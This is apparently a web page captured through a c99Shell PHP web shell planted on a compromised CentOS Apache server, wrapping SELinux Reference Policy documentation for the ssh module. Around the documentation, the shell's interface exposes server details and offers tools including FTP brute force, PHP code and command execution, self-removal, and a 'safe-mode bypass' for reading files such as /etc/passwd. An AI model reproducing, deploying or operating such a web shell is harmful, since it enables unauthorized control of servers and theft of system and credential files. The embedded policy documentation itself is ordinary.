!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/selinux-policy-2.4.6/html/   drwxr-xr-x
Free 51.95 GB of 127.8 GB (40.65%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     services_ssh.html (22.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Security Enhanced Linux Reference Policy

Layer: services

Module: ssh

Interfaces Templates

Description:

Secure shell client and server policy.

Interfaces:

ssh_domtrans( domain )
Summary

Execute the ssh daemon sshd domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_domtrans_keygen( domain )
Summary

Execute the ssh key generator in the ssh keygen domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_dontaudit_read_server_keys( domain )
Summary

Read ssh server keys

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_dontaudit_rw_tcp_sockets( domain )
Summary

Do not audit attempts to read and write ssh server TCP sockets.

Parameters
Parameter:Description:Optional:
domain

Domain to not audit.

No
ssh_dontaudit_use_user_ssh_agent_fds( domain )
Summary

dontaudit use of file descriptor from the ssh-agent.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_exec( domain )
Summary

Execute the ssh client in the caller domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_read_pipes( domain )
Summary

Read a ssh server unnamed pipe.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_rw_stream_sockets( domain )
Summary

Read and write ssh server unix domain stream sockets.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_rw_tcp_sockets( domain )
Summary

Read and write ssh server TCP sockets.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_setattr_server_keys( domain )
Summary

Read ssh server keys

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_sigchld( domain )
Summary

Send a SIGCHLD signal to the ssh server.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_tcp_connect( domain )
Summary

Connect to SSH daemons over TCP sockets. (Deprecated)

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
ssh_use_user_ssh_agent_fds( domain )
Summary

Inherit and use a file descriptor from the ssh-agent.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
Return

Templates:

ssh_basic_client_template( userdomain_prefix , user_domain , user_role )
Summary

Basic SSH client template.

Description

This template creates a derived domains which are used for ssh client sessions. A derived type is also created to protect the user ssh keys.

This template was added for NX.

Parameters
Parameter:Description:Optional:
userdomain_prefix

The prefix of the domain (e.g., user is the prefix for user_t).

No
user_domain

The type of the domain.

No
user_role

The role associated with the user domain.

No
ssh_per_role_template( userdomain_prefix , user_domain , user_role )
Summary

The per role template for the ssh module.

Description

This template creates a derived domains which are used for ssh client sessions and user ssh agents. A derived type is also created to protect the user ssh keys.

This template is invoked automatically for each user, and generally does not need to be invoked directly by policy writers.

Parameters
Parameter:Description:Optional:
userdomain_prefix

The prefix of the user domain (e.g., user is the prefix for user_t).

No
user_domain

The type of the user domain.

No
user_role

The role associated with the user domain.

No
ssh_server_template( userdomain_prefix )
Summary

The template to define a ssh server.

Description

This template creates a domains to be used for creating a ssh server. This is typically done to have multiple ssh servers of different sensitivities, such as for an internal network-facing ssh server, and a external network-facing ssh server.

Parameters
Parameter:Description:Optional:
userdomain_prefix

The prefix of the server domain (e.g., sshd is the prefix for sshd_t).

No
Return

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0196 ]--